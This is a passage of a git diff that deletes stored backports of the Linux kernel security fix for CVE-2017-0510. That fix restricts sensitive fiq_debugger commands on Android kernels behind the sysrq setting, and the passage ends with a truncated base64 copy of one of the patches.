-Signed-off-by: Mark Salyzyn <salyzyn@google.com>
-Bug: 32402555
-Change-Id: I3f74b1ff5e4971d619bcb37a911fed68fbb538d5
-[d-cagle@codeaurora.org: Resolve merge conflict]
-Git-repo: https://android.googlesource.com/kernel/msm
-Git-commit: 1031836c0895f1f5a05c25efec83bfa11aa08ca9
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- .../staging/android/fiq_debugger/fiq_debugger.c    | 86 ++++++++++++++--------
- drivers/tty/sysrq.c                                |  3 +-
- include/linux/sysrq.h                              |  1 +
- 3 files changed, 57 insertions(+), 33 deletions(-)
-
-diff --git a/drivers/staging/android/fiq_debugger/fiq_debugger.c b/drivers/staging/android/fiq_debugger/fiq_debugger.c
-index 7d6b4ae..ceb45bc9e 100644
---- a/drivers/staging/android/fiq_debugger/fiq_debugger.c
-+++ b/drivers/staging/android/fiq_debugger/fiq_debugger.c
-@@ -30,6 +30,7 @@
- #include <linux/sched.h>
- #include <linux/slab.h>
- #include <linux/smp.h>
-+#include <linux/sysrq.h>
- #include <linux/timer.h>
- #include <linux/tty.h>
- #include <linux/tty_flip.h>
-@@ -395,7 +396,7 @@ static void fiq_debugger_work(struct work_struct *work)
- 		cmd += 6;
- 		while (*cmd == ' ')
- 			cmd++;
--		if (cmd != '\0')
-+		if ((cmd != '\0') && sysrq_on())
- 			kernel_restart(cmd);
- 		else
- 			kernel_restart(NULL);
-@@ -425,29 +426,39 @@ static void fiq_debugger_irq_exec(struct fiq_debugger_state *state, char *cmd)
- static void fiq_debugger_help(struct fiq_debugger_state *state)
- {
- 	fiq_debugger_printf(&state->output,
--				"FIQ Debugger commands:\n"
--				" pc            PC status\n"
--				" regs          Register dump\n"
--				" allregs       Extended Register dump\n"
--				" bt            Stack trace\n"
--				" reboot [<c>]  Reboot with command <c>\n"
--				" reset [<c>]   Hard reset with command <c>\n"
--				" irqs          Interupt status\n"
--				" kmsg          Kernel log\n"
--				" version       Kernel version\n");
--	fiq_debugger_printf(&state->output,
--				" sleep         Allow sleep while in FIQ\n"
--				" nosleep       Disable sleep while in FIQ\n"
--				" console       Switch terminal to console\n"
--				" cpu           Current CPU\n"
--				" cpu <number>  Switch to CPU<number>\n");
-+			"FIQ Debugger commands:\n");
-+	if (sysrq_on()) {
-+		fiq_debugger_printf(&state->output,
-+			" pc            PC status\n"
-+			" regs          Register dump\n"
-+			" allregs       Extended Register dump\n"
-+			" bt            Stack trace\n");
-+		fiq_debugger_printf(&state->output,
-+			" reboot [<c>]  Reboot with command <c>\n"
-+			" reset [<c>]   Hard reset with command <c>\n"
-+			" irqs          Interrupt status\n"
-+			" kmsg          Kernel log\n"
-+			" version       Kernel version\n");
-+		fiq_debugger_printf(&state->output,
-+			" cpu           Current CPU\n"
-+			" cpu <number>  Switch to CPU<number>\n"
-+			" sysrq         sysrq options\n"
-+			" sysrq <param> Execute sysrq with <param>\n");
-+	} else {
-+		fiq_debugger_printf(&state->output,
-+			" reboot        Reboot\n"
-+			" reset         Hard reset\n"
-+			" irqs          Interrupt status\n");
-+	}
- 	fiq_debugger_printf(&state->output,
--				" ps            Process list\n"
--				" sysrq         sysrq options\n"
--				" sysrq <param> Execute sysrq with <param>\n");
-+			" sleep         Allow sleep while in FIQ\n"
-+			" nosleep       Disable sleep while in FIQ\n"
-+			" console       Switch terminal to console\n"
-+			" ps            Process list\n");
- #ifdef CONFIG_KGDB
--	fiq_debugger_printf(&state->output,
--				" kgdb          Enter kernel debugger\n");
-+	if (fiq_kgdb_enable) {
-+		fiq_debugger_printf(&state->output,
-+			" kgdb          Enter kernel debugger\n");
- #endif
- }
- 
-@@ -479,18 +490,23 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- 	if (!strcmp(cmd, "help") || !strcmp(cmd, "?")) {
- 		fiq_debugger_help(state);
- 	} else if (!strcmp(cmd, "pc")) {
--		fiq_debugger_dump_pc(&state->output, regs);
-+		if (sysrq_on())
-+			fiq_debugger_dump_pc(&state->output, regs);
- 	} else if (!strcmp(cmd, "regs")) {
--		fiq_debugger_dump_regs(&state->output, regs);
-+		if (sysrq_on())
-+			fiq_debugger_dump_regs(&state->output, regs);
- 	} else if (!strcmp(cmd, "allregs")) {
--		fiq_debugger_dump_allregs(&state->output, regs);
-+		if (sysrq_on())
-+			fiq_debugger_dump_allregs(&state->output, regs);
- 	} else if (!strcmp(cmd, "bt")) {
--		fiq_debugger_dump_stacktrace(&state->output, regs, 100, svc_sp);
-+		if (sysrq_on())
-+			fiq_debugger_dump_stacktrace(&state->output, regs,
-+						     100, svc_sp);
- 	} else if (!strncmp(cmd, "reset", 5)) {
- 		cmd += 5;
- 		while (*cmd == ' ')
- 			cmd++;
--		if (*cmd) {
-+		if (*cmd && sysrq_on()) {
- 			char tmp_cmd[32];
- 			strlcpy(tmp_cmd, cmd, sizeof(tmp_cmd));
- 			machine_restart(tmp_cmd);
-@@ -500,9 +516,12 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- 	} else if (!strcmp(cmd, "irqs")) {
- 		fiq_debugger_dump_irqs(state);
- 	} else if (!strcmp(cmd, "kmsg")) {
--		fiq_debugger_dump_kernel_log(state);
-+		if (sysrq_on())
-+			fiq_debugger_dump_kernel_log(state);
- 	} else if (!strcmp(cmd, "version")) {
--		fiq_debugger_printf(&state->output, "%s\n", linux_banner);
-+		if (sysrq_on())
-+			fiq_debugger_printf(&state->output, "%s\n",
-+					    linux_banner);
- 	} else if (!strcmp(cmd, "sleep")) {
- 		state->no_sleep = false;
- 		fiq_debugger_printf(&state->output, "enabling sleep\n");
-@@ -514,14 +533,17 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- 		fiq_debugger_uart_flush(state);
- 		state->console_enable = true;
- 	} else if (!strcmp(cmd, "cpu")) {
--		fiq_debugger_printf(&state->output, "cpu %d\n", state->current_cpu);
--	} else if (!strncmp(cmd, "cpu ", 4)) {
-+		if (sysrq_on())
-+			fiq_debugger_printf(&state->output, "cpu %d\n",
-+					    state->current_cpu);
-+	} else if (!strncmp(cmd, "cpu ", 4) && sysrq_on()) {
- 		unsigned long cpu = 0;
- 		if (strict_strtoul(cmd + 4, 10, &cpu) == 0)
- 			fiq_debugger_switch_cpu(state, cpu);
- 		else
- 			fiq_debugger_printf(&state->output, "invalid cpu\n");
--		fiq_debugger_printf(&state->output, "cpu %d\n", state->current_cpu);
-+		fiq_debugger_printf(&state->output, "cpu %d\n",
-+				    state->current_cpu);
- 	} else {
- 		if (state->debug_busy) {
- 			fiq_debugger_printf(&state->output,
-diff --git a/drivers/tty/sysrq.c b/drivers/tty/sysrq.c
-index b51c154..08c9406 100644
---- a/drivers/tty/sysrq.c
-+++ b/drivers/tty/sysrq.c
-@@ -55,10 +55,11 @@ static bool __read_mostly sysrq_always_enabled;
- unsigned short platform_sysrq_reset_seq[] __weak = { KEY_RESERVED };
- int sysrq_reset_downtime_ms __weak;
- 
--static bool sysrq_on(void)
-+bool sysrq_on(void)
- {
- 	return sysrq_enabled || sysrq_always_enabled;
- }
-+EXPORT_SYMBOL(sysrq_on);
- 
- /*
-  * A value of 1 means 'all', other nonzero values are an op mask:
-diff --git a/include/linux/sysrq.h b/include/linux/sysrq.h
-index 7faf933..5a0bd93 100644
---- a/include/linux/sysrq.h
-+++ b/include/linux/sysrq.h
-@@ -45,6 +45,7 @@ struct sysrq_key_op {
-  * are available -- else NULL's).
-  */
- 
-+bool sysrq_on(void);
- void handle_sysrq(int key);
- void __handle_sysrq(int key, bool check_mask);
- int register_sysrq_key(int key, struct sysrq_key_op *op);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0510/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2017-0510/3.18/0003.patch
deleted file mode 100644
index 423f121c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0510/3.18/0003.patch
+++ /dev/null
@@ -1,206 +0,0 @@
-From 7a4fd6fb0df85d16db29561e0063b41a62f11e4d Mon Sep 17 00:00:00 2001
-From: Mark Salyzyn <salyzyn@google.com>
-Date: Tue, 20 Dec 2016 15:59:19 -0800
-Subject: android: fiq_debugger: restrict access to critical commands.
-
-Sysrq must be enabled via /proc/sys/kernel/sysrq as a security
-measure to enable various critical fiq debugger commands that
-either leak information or can be used as a system attack.
-
-Default disabled, this will leave the reboot, reset, irqs, sleep,
-nosleep, console and ps commands.  Reboot and reset commands
-will be restricted from taking any parameters.  We will also
-switch to showing the limited command set in this mode.
-
-Signed-off-by: Mark Salyzyn <salyzyn@google.com>
-Bug: 32402555
-Change-Id: I3f74b1ff5e4971d619bcb37a911fed68fbb538d5
-[d-cagle@codeaurora.org: Resolve merge conflict]
-Git-repo: https://android.googlesource.com/kernel/msm
-Git-commit: 1031836c0895f1f5a05c25efec83bfa11aa08ca9
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
----
- .../staging/android/fiq_debugger/fiq_debugger.c    | 86 ++++++++++++++--------
- drivers/tty/sysrq.c                                |  3 +-
- include/linux/sysrq.h                              |  1 +
- 3 files changed, 57 insertions(+), 33 deletions(-)
-
-diff --git a/drivers/staging/android/fiq_debugger/fiq_debugger.c b/drivers/staging/android/fiq_debugger/fiq_debugger.c
-index 52f6816..0abced1 100644
---- a/drivers/staging/android/fiq_debugger/fiq_debugger.c
-+++ b/drivers/staging/android/fiq_debugger/fiq_debugger.c
-@@ -30,6 +30,7 @@
- #include <linux/sched.h>
- #include <linux/slab.h>
- #include <linux/smp.h>
-+#include <linux/sysrq.h>
- #include <linux/timer.h>
- #include <linux/tty.h>
- #include <linux/tty_flip.h>
-@@ -395,7 +396,7 @@ static void fiq_debugger_work(struct work_struct *work)
- 		cmd += 6;
- 		while (*cmd == ' ')
- 			cmd++;
--		if (cmd != '\0')
-+		if ((cmd != '\0') && sysrq_on())
- 			kernel_restart(cmd);
- 		else
- 			kernel_restart(NULL);
-@@ -425,29 +426,39 @@ static void fiq_debugger_irq_exec(struct fiq_debugger_state *state, char *cmd)
- static void fiq_debugger_help(struct fiq_debugger_state *state)
- {
- 	fiq_debugger_printf(&state->output,
--				"FIQ Debugger commands:\n"
--				" pc            PC status\n"
--				" regs          Register dump\n"
--				" allregs       Extended Register dump\n"
--				" bt            Stack trace\n"
--				" reboot [<c>]  Reboot with command <c>\n"
--				" reset [<c>]   Hard reset with command <c>\n"
--				" irqs          Interupt status\n"
--				" kmsg          Kernel log\n"
--				" version       Kernel version\n");
--	fiq_debugger_printf(&state->output,
--				" sleep         Allow sleep while in FIQ\n"
--				" nosleep       Disable sleep while in FIQ\n"
--				" console       Switch terminal to console\n"
--				" cpu           Current CPU\n"
--				" cpu <number>  Switch to CPU<number>\n");
-+			"FIQ Debugger commands:\n");
-+	if (sysrq_on()) {
-+		fiq_debugger_printf(&state->output,
-+			" pc            PC status\n"
-+			" regs          Register dump\n"
-+			" allregs       Extended Register dump\n"
-+			" bt            Stack trace\n");
-+		fiq_debugger_printf(&state->output,
-+			" reboot [<c>]  Reboot with command <c>\n"
-+			" reset [<c>]   Hard reset with command <c>\n"
-+			" irqs          Interrupt status\n"
-+			" kmsg          Kernel log\n"
-+			" version       Kernel version\n");
-+		fiq_debugger_printf(&state->output,
-+			" cpu           Current CPU\n"
-+			" cpu <number>  Switch to CPU<number>\n"
-+			" sysrq         sysrq options\n"
-+			" sysrq <param> Execute sysrq with <param>\n");
-+	} else {
-+		fiq_debugger_printf(&state->output,
-+			" reboot        Reboot\n"
-+			" reset         Hard reset\n"
-+			" irqs          Interrupt status\n");
-+	}
- 	fiq_debugger_printf(&state->output,
--				" ps            Process list\n"
--				" sysrq         sysrq options\n"
--				" sysrq <param> Execute sysrq with <param>\n");
-+			" sleep         Allow sleep while in FIQ\n"
-+			" nosleep       Disable sleep while in FIQ\n"
-+			" console       Switch terminal to console\n"
-+			" ps            Process list\n");
- #ifdef CONFIG_KGDB
--	fiq_debugger_printf(&state->output,
--				" kgdb          Enter kernel debugger\n");
-+	if (fiq_kgdb_enable) {
-+		fiq_debugger_printf(&state->output,
-+			" kgdb          Enter kernel debugger\n");
- #endif
- }
- 
-@@ -479,18 +490,23 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- 	if (!strcmp(cmd, "help") || !strcmp(cmd, "?")) {
- 		fiq_debugger_help(state);
- 	} else if (!strcmp(cmd, "pc")) {
--		fiq_debugger_dump_pc(&state->output, regs);
-+		if (sysrq_on())
-+			fiq_debugger_dump_pc(&state->output, regs);
- 	} else if (!strcmp(cmd, "regs")) {
--		fiq_debugger_dump_regs(&state->output, regs);
-+		if (sysrq_on())
-+			fiq_debugger_dump_regs(&state->output, regs);
- 	} else if (!strcmp(cmd, "allregs")) {
--		fiq_debugger_dump_allregs(&state->output, regs);
-+		if (sysrq_on())
-+			fiq_debugger_dump_allregs(&state->output, regs);
- 	} else if (!strcmp(cmd, "bt")) {
--		fiq_debugger_dump_stacktrace(&state->output, regs, 100, svc_sp);
-+		if (sysrq_on())
-+			fiq_debugger_dump_stacktrace(&state->output, regs,
-+						     100, svc_sp);
- 	} else if (!strncmp(cmd, "reset", 5)) {
- 		cmd += 5;
- 		while (*cmd == ' ')
- 			cmd++;
--		if (*cmd) {
-+		if (*cmd && sysrq_on()) {
- 			char tmp_cmd[32];
- 			strlcpy(tmp_cmd, cmd, sizeof(tmp_cmd));
- 			machine_restart(tmp_cmd);
-@@ -500,9 +516,12 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- 	} else if (!strcmp(cmd, "irqs")) {
- 		fiq_debugger_dump_irqs(state);
- 	} else if (!strcmp(cmd, "kmsg")) {
--		fiq_debugger_dump_kernel_log(state);
-+		if (sysrq_on())
-+			fiq_debugger_dump_kernel_log(state);
- 	} else if (!strcmp(cmd, "version")) {
--		fiq_debugger_printf(&state->output, "%s\n", linux_banner);
-+		if (sysrq_on())
-+			fiq_debugger_printf(&state->output, "%s\n",
-+					    linux_banner);
- 	} else if (!strcmp(cmd, "sleep")) {
- 		state->no_sleep = false;
- 		fiq_debugger_printf(&state->output, "enabling sleep\n");
-@@ -514,14 +533,17 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- 		fiq_debugger_uart_flush(state);
- 		state->console_enable = true;
- 	} else if (!strcmp(cmd, "cpu")) {
--		fiq_debugger_printf(&state->output, "cpu %d\n", state->current_cpu);
--	} else if (!strncmp(cmd, "cpu ", 4)) {
-+		if (sysrq_on())
-+			fiq_debugger_printf(&state->output, "cpu %d\n",
-+					    state->current_cpu);
-+	} else if (!strncmp(cmd, "cpu ", 4) && sysrq_on()) {
- 		unsigned long cpu = 0;
- 		if (kstrtoul(cmd + 4, 10, &cpu) == 0)
- 			fiq_debugger_switch_cpu(state, cpu);
- 		else
- 			fiq_debugger_printf(&state->output, "invalid cpu\n");
--		fiq_debugger_printf(&state->output, "cpu %d\n", state->current_cpu);
-+		fiq_debugger_printf(&state->output, "cpu %d\n",
-+				    state->current_cpu);
- 	} else {
- 		if (state->debug_busy) {
- 			fiq_debugger_printf(&state->output,
-diff --git a/drivers/tty/sysrq.c b/drivers/tty/sysrq.c
-index d0c19b1..2ecb363 100644
---- a/drivers/tty/sysrq.c
-+++ b/drivers/tty/sysrq.c
-@@ -58,10 +58,11 @@ static bool __read_mostly sysrq_always_enabled;
- unsigned short platform_sysrq_reset_seq[] __weak = { KEY_RESERVED };
- int sysrq_reset_downtime_ms __weak;
- 
--static bool sysrq_on(void)
-+bool sysrq_on(void)
- {
- 	return sysrq_enabled || sysrq_always_enabled;
- }
-+EXPORT_SYMBOL(sysrq_on);
- 
- /*
-  * A value of 1 means 'all', other nonzero values are an op mask:
-diff --git a/include/linux/sysrq.h b/include/linux/sysrq.h
-index 387fa7d..d802692 100644
---- a/include/linux/sysrq.h
-+++ b/include/linux/sysrq.h
-@@ -42,6 +42,7 @@ struct sysrq_key_op {
-  * are available -- else NULL's).
-  */
- 
-+bool sysrq_on(void);
- void handle_sysrq(int key);
- void __handle_sysrq(int key, bool check_mask);
- int register_sysrq_key(int key, struct sysrq_key_op *op);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch
deleted file mode 100644
index 4ab6691b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch
+++ /dev/null
@@ -1,213 +0,0 @@
-From faca1e5a1ca8f637ac0c213094159ea4fae059f9 Mon Sep 17 00:00:00 2001
-From: Mark Salyzyn <salyzyn@google.com>
-Date: Tue, 20 Dec 2016 15:59:19 -0800
-Subject: [PATCH] BACKPORT: fiq_debugger: restrict access to critical commands.
-
-Sysrq must be enabled via /proc/sys/kernel/sysrq as a security
-measure to enable various critical fiq debugger commands that
-either leak information or can be used as a system attack.
-
-Default disabled, this will leave the reboot, reset, irqs, sleep,
-nosleep, console and ps commands.  Reboot and reset commands
-will be restricted from taking any parameters.  We will also
-switch to showing the limited command set in this mode.
-
-Signed-off-by: Mark Salyzyn <salyzyn@google.com>
-Bug: 32402555
-[d-cagle@codeaurora.org: Resolve merge conflict]
-Git-repo: https://android.googlesource.com/kernel/msm
-Git-commit: 1031836c0895f1f5a05c25efec83bfa11aa08ca9
-Signed-off-by: Dennis Cagle <d-cagle@codeaurora.org>
-
-Backport reference:
- * Adapted for arch/arm/common/fiq_debugger.c
- * Adapt to the old use of debug_printf
-
-Change-Id: I0a6aecd9b3d5bd62db06beac76682349854198d7
-Signed-off-by: Adrian DC <radian.dc@gmail.com>
----
-
-diff --git a/arch/arm/common/fiq_debugger.c b/arch/arm/common/fiq_debugger.c
-index 518b4b5..5e0e3ed 100644
---- a/arch/arm/common/fiq_debugger.c
-+++ b/arch/arm/common/fiq_debugger.c
-@@ -30,6 +30,7 @@
- #include <linux/sched.h>
- #include <linux/slab.h>
- #include <linux/smp.h>
-+#include <linux/sysrq.h>
- #include <linux/timer.h>
- #include <linux/tty.h>
- #include <linux/tty_flip.h>
-@@ -580,12 +581,13 @@
- 		cmd += 6;
- 		while (*cmd == ' ')
- 			cmd++;
--		if (cmd != '\0')
-+		if ((cmd != '\0') && sysrq_on())
- 			kernel_restart(cmd);
- 		else
- 			kernel_restart(NULL);
- 	} else {
--		debug_printf(state, "unknown work command '%s'\n", work_cmd);
-+		debug_printf(state, "unknown work command '%s'\n",
-+				work_cmd);
- 	}
- }
- 
-@@ -608,26 +610,40 @@
- 
- static void debug_help(struct fiq_debugger_state *state)
- {
--	debug_printf(state,	"FIQ Debugger commands:\n"
--				" pc            PC status\n"
--				" regs          Register dump\n"
--				" allregs       Extended Register dump\n"
--				" bt            Stack trace\n"
--				" reboot [<c>]  Reboot with command <c>\n"
--				" reset [<c>]   Hard reset with command <c>\n"
--				" irqs          Interupt status\n"
--				" kmsg          Kernel log\n"
--				" version       Kernel version\n");
--	debug_printf(state,	" sleep         Allow sleep while in FIQ\n"
--				" nosleep       Disable sleep while in FIQ\n"
--				" console       Switch terminal to console\n"
--				" cpu           Current CPU\n"
--				" cpu <number>  Switch to CPU<number>\n");
--	debug_printf(state,	" ps            Process list\n"
--				" sysrq         sysrq options\n"
--				" sysrq <param> Execute sysrq with <param>\n");
-+	debug_printf(state,
-+			"FIQ Debugger commands:\n");
-+	if (sysrq_on()) {
-+		debug_printf(state,
-+			" pc            PC status\n"
-+			" regs          Register dump\n"
-+			" allregs       Extended Register dump\n"
-+			" bt            Stack trace\n");
-+		debug_printf(state,
-+			" reboot [<c>]  Reboot with command <c>\n"
-+			" reset [<c>]   Hard reset with command <c>\n"
-+			" irqs          Interrupt status\n"
-+			" kmsg          Kernel log\n"
-+			" version       Kernel version\n");
-+		debug_printf(state,
-+			" cpu           Current CPU\n"
-+			" cpu <number>  Switch to CPU<number>\n"
-+			" sysrq         sysrq options\n"
-+			" sysrq <param> Execute sysrq with <param>\n");
-+	} else {
-+		debug_printf(state,
-+			" reboot        Reboot\n"
-+			" reset         Hard reset\n"
-+			" irqs          Interrupt status\n");
-+	}
-+	debug_printf(state,
-+			" sleep         Allow sleep while in FIQ\n"
-+			" nosleep       Disable sleep while in FIQ\n"
-+			" console       Switch terminal to console\n"
-+			" ps            Process list\n");
- #ifdef CONFIG_KGDB
--	debug_printf(state,	" kgdb          Enter kernel debugger\n");
-+	if (fiq_kgdb_enable) {
-+		debug_printf(state,
-+			" kgdb          Enter kernel debugger\n");
- #endif
- }
- 
-@@ -657,19 +673,24 @@
- 	if (!strcmp(cmd, "help") || !strcmp(cmd, "?")) {
- 		debug_help(state);
- 	} else if (!strcmp(cmd, "pc")) {
--		debug_printf(state, " pc %08x cpsr %08x mode %s\n",
--			regs[15], regs[16], mode_name(regs[16]));
-+		if (sysrq_on())
-+			debug_printf(state, " pc %08x cpsr %08x mode %s\n",
-+				regs[15], regs[16], mode_name(regs[16]));
- 	} else if (!strcmp(cmd, "regs")) {
--		dump_regs(state, regs);
-+		if (sysrq_on())
-+			dump_regs(state, regs);
- 	} else if (!strcmp(cmd, "allregs")) {
--		dump_allregs(state, regs);
-+		if (sysrq_on())
-+			dump_allregs(state, regs);
- 	} else if (!strcmp(cmd, "bt")) {
--		dump_stacktrace(state, (struct pt_regs *)regs, 100, svc_sp);
-+		if (sysrq_on())
-+			dump_stacktrace(state, (struct pt_regs *)regs,
-+					100, svc_sp);
- 	} else if (!strncmp(cmd, "reset", 5)) {
- 		cmd += 5;
- 		while (*cmd == ' ')
- 			cmd++;
--		if (*cmd) {
-+		if (*cmd && sysrq_on()) {
- 			char tmp_cmd[32];
- 			strlcpy(tmp_cmd, cmd, sizeof(tmp_cmd));
- 			machine_restart(tmp_cmd);
-@@ -679,9 +700,12 @@
- 	} else if (!strcmp(cmd, "irqs")) {
- 		dump_irqs(state);
- 	} else if (!strcmp(cmd, "kmsg")) {
--		dump_kernel_log(state);
-+		if (sysrq_on())
-+			dump_kernel_log(state);
- 	} else if (!strcmp(cmd, "version")) {
--		debug_printf(state, "%s\n", linux_banner);
-+		if (sysrq_on())
-+			debug_printf(state, "%s\n",
-+					linux_banner);
- 	} else if (!strcmp(cmd, "sleep")) {
- 		state->no_sleep = false;
- 		debug_printf(state, "enabling sleep\n");
-@@ -693,14 +717,17 @@
- 		debug_uart_flush(state);
- 		state->console_enable = true;
- 	} else if (!strcmp(cmd, "cpu")) {
--		debug_printf(state, "cpu %d\n", state->current_cpu);
--	} else if (!strncmp(cmd, "cpu ", 4)) {
-+		if (sysrq_on())
-+			debug_printf(state, "cpu %d\n",
-+					state->current_cpu);
-+	} else if (!strncmp(cmd, "cpu ", 4) && sysrq_on()) {
- 		unsigned long cpu = 0;
- 		if (strict_strtoul(cmd + 4, 10, &cpu) == 0)
- 			switch_cpu(state, cpu);
- 		else
- 			debug_printf(state, "invalid cpu\n");
--		debug_printf(state, "cpu %d\n", state->current_cpu);
-+		debug_printf(state, "cpu %d\n",
-+				    state->current_cpu);
- 	} else {
- 		if (state->debug_busy) {
- 			debug_printf(state,
-diff --git a/drivers/tty/sysrq.c b/drivers/tty/sysrq.c
-index 05728894..6efbfb7 100644
---- a/drivers/tty/sysrq.c
-+++ b/drivers/tty/sysrq.c
-@@ -49,10 +49,11 @@
- static int __read_mostly sysrq_enabled = SYSRQ_DEFAULT_ENABLE;
- static bool __read_mostly sysrq_always_enabled;
- 
--static bool sysrq_on(void)
-+bool sysrq_on(void)
- {
- 	return sysrq_enabled || sysrq_always_enabled;
- }
-+EXPORT_SYMBOL(sysrq_on);
- 
- /*
-  * A value of 1 means 'all', other nonzero values are an op mask:
-diff --git a/include/linux/sysrq.h b/include/linux/sysrq.h
-index 7faf933..5a0bd93 100644
---- a/include/linux/sysrq.h
-+++ b/include/linux/sysrq.h
-@@ -45,6 +45,7 @@
-  * are available -- else NULL's).
-  */
- 
-+bool sysrq_on(void);
- void handle_sysrq(int key);
- void __handle_sysrq(int key, bool check_mask);
- int register_sysrq_key(int key, struct sysrq_key_op *op);
diff --git a/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch.base64
deleted file mode 100644
index f0cea285..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSBmYWNhMWU1YTFjYThmNjM3YWMwYzIxMzA5NDE1OWVhNGZhZTA1OWY5IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBNYXJrIFNhbHl6eW4gPHNhbHl6eW5AZ29vZ2xlLmNvbT4KRGF0ZTogVHVlLCAyMCBEZWMgMjAxNiAxNTo1OToxOSAtMDgwMApTdWJqZWN0OiBbUEFUQ0hdIEJBQ0tQT1JUOiBmaXFfZGVidWdnZXI6IHJlc3RyaWN0IGFjY2VzcyB0byBjcml0aWNhbCBjb21tYW5kcy4KClN5c3JxIG11c3QgYmUgZW5hYmxlZCB2aWEgL3Byb2Mvc3lzL2tlcm5lbC9zeXNycSBhcyBhIHNlY3VyaXR5Cm1lYXN1cmUgdG8gZW5hYmxlIHZhcmlvdXMgY3JpdGljYWwgZmlxIGRlYnVnZ2VyIGNvbW1hbmRzIHRoYXQKZWl0aGVyIGxlYWsgaW5mb3JtYXRpb24gb3IgY2FuIGJlIHVzZWQgYXMgYSBzeXN0ZW0gYXR0YWNrLgoKRGVmYXVsdCBkaXNhYmxlZCwgdGhpcyB3aWxsIGxlYXZlIHRoZSByZWJvb3QsIHJlc2V0LCBpcnFzLCBzbGVlcCwKbm9zbGVlcCwgY29uc29sZSBhbmQgcHMgY29tbWFuZHMuICBSZWJvb3QgYW5kIHJlc2V0IGNvbW1hbmRzCndpbGwgYmUgcmVzdHJpY3RlZCBmcm9tIHRha2luZyBhbnkgcGFyYW1ldGVycy4gIFdlIHdpbGwgYWxzbwpzd2l0Y2ggdG8gc2hvd2luZyB0aGUgbGltaXRlZCBjb21tYW5kIHNldCBpbiB0aGlzIG1vZGUuCgpTaWduZWQtb2ZmLWJ5OiBNYXJrIFNhbHl6eW4gPHNhbHl6eW5AZ29vZ2xlLmNvbT4KQnVnOiAzMjQwMjU1NQpbZC1jYWdsZUBjb2RlYXVyb3JhLm9yZzogUmVzb2x2ZSBtZXJnZSBjb25mbGljdF0KR2l0LXJlcG86IGh0dHBzOi8vYW5kcm9pZC5nb29nbGVzb3VyY2UuY29tL2tlcm5lbC9tc20KR2l0LWNvbW1pdDogMTAzMTgzNmMwODk1ZjFmNWEwNWMyNWVmZWM4M2JmYTExYWEwOGNhOQpTaWduZWQtb2ZmLWJ5OiBEZW5uaXMgQ2FnbGUgPGQtY2FnbGVAY29kZWF1cm9yYS5vcmc+CgpCYWNrcG9ydCByZWZlcmVuY2U6CiAqIEFkYXB0ZWQgZm9yIGFyY2gvYXJtL2NvbW1vbi9maXFfZGVidWdnZXIuYwogKiBBZGFwdCB0byB0aGUgb2xkIHVzZSBvZiBkZWJ1Z19wcmludGYKCkNoYW5nZS1JZDogSTBhNmFlY2Q5YjNkNWJkNjJkYjA2YmVhYzc2NjgyMzQ5ODU0MTk4ZDcKU2lnbmVkLW9mZi1ieTogQWRyaWFuIERDIDxyYWRpYW4uZGNAZ21haWwuY29tPgotLS0KCmRpZmYgLS1naXQgYS9hcmNoL2FybS9jb21tb24vZmlxX2RlYnVnZ2VyLmMgYi9hcmNoL2FybS9jb21tb24vZmlxX2RlYnVnZ2VyLmMKaW5kZXggNTE4YjRiNS4uNWUwZTNlZCAxMDA2NDQKLS0tIGEvYXJjaC9hcm0vY29tbW9uL2ZpcV9kZWJ1Z2dlci5jCisrKyBiL2FyY2gvYXJtL2NvbW1vbi9maXFfZGVidWdnZXIuYwpAQCAtMzAsNiArMzAsNyBAQAogI2luY2x1ZGUgPGxpbnV4L3NjaGVkLmg+CiAjaW5jbHVkZSA8bGludXgvc2xhYi5oPgogI2luY2x1ZGUgPGxpbnV4L3NtcC5oPgorI2luY2x1ZGUgPGxpbnV4L3N5c3JxLmg+CiAjaW5jbHVkZSA8bGludXgvdGltZXIuaD4KICNpbmNsdWRlIDxsaW51eC90dHkuaD4KICNpbmNsdWRlIDxsaW51eC90dHlfZmxpcC5oPgpAQCAtNTgwLDEyICs1ODEsMTMgQEAKIAkJY21kICs9IDY7CiAJCXdoaWxlICgqY21kID09ICcgJykKIAkJCWNtZCsrOwotCQlpZiAoY21kICE9ICdcMCcpCisJCWlmICgoY21kICE9ICdcMCcpICYmIHN5c3JxX29uKCkpCiAJCQlrZXJuZWxfcmVzdGFydChjbWQpOwogCQllbHNlCiAJCQlrZXJuZWxfcmVzdGFydChOVUxMKTsKIAl9IGVsc2UgewotCQlkZWJ1Z19wcmludGYoc3RhdGUsICJ1bmtub3duIHdvcmsgY29tbWFuZCAnJXMnXG4iLCB3b3JrX2NtZCk7CisJCWRlYnVnX3ByaW50ZihzdGF0ZSwgInVua25vd24gd29yayBjb21tYW5kICclcydcbiIsCisJCQkJd29ya19jbWQpOwogCX0KIH0KIApAQCAtNjA4LDI2ICs2MTAsNDAgQEAKIAogc3RhdGljIHZvaWQgZGVidWdfaGVscChzdHJ1Y3QgZmlxX2RlYnVnZ2VyX3N0YXRlICpzdGF0ZSkKIHsKLQlkZWJ1Z19wcmludGYoc3RhdGUsCSJGSVEgRGVidWdnZXIgY29tbWFuZHM6XG4iCi0JCQkJIiBwYyAgICAgICAgICAgIFBDIHN0YXR1c1xuIgotCQkJCSIgcmVncyAgICAgICAgICBSZWdpc3RlciBkdW1wXG4iCi0JCQkJIiBhbGxyZWdzICAgICAgIEV4dGVuZGVkIFJlZ2lzdGVyIGR1bXBcbiIKLQkJCQ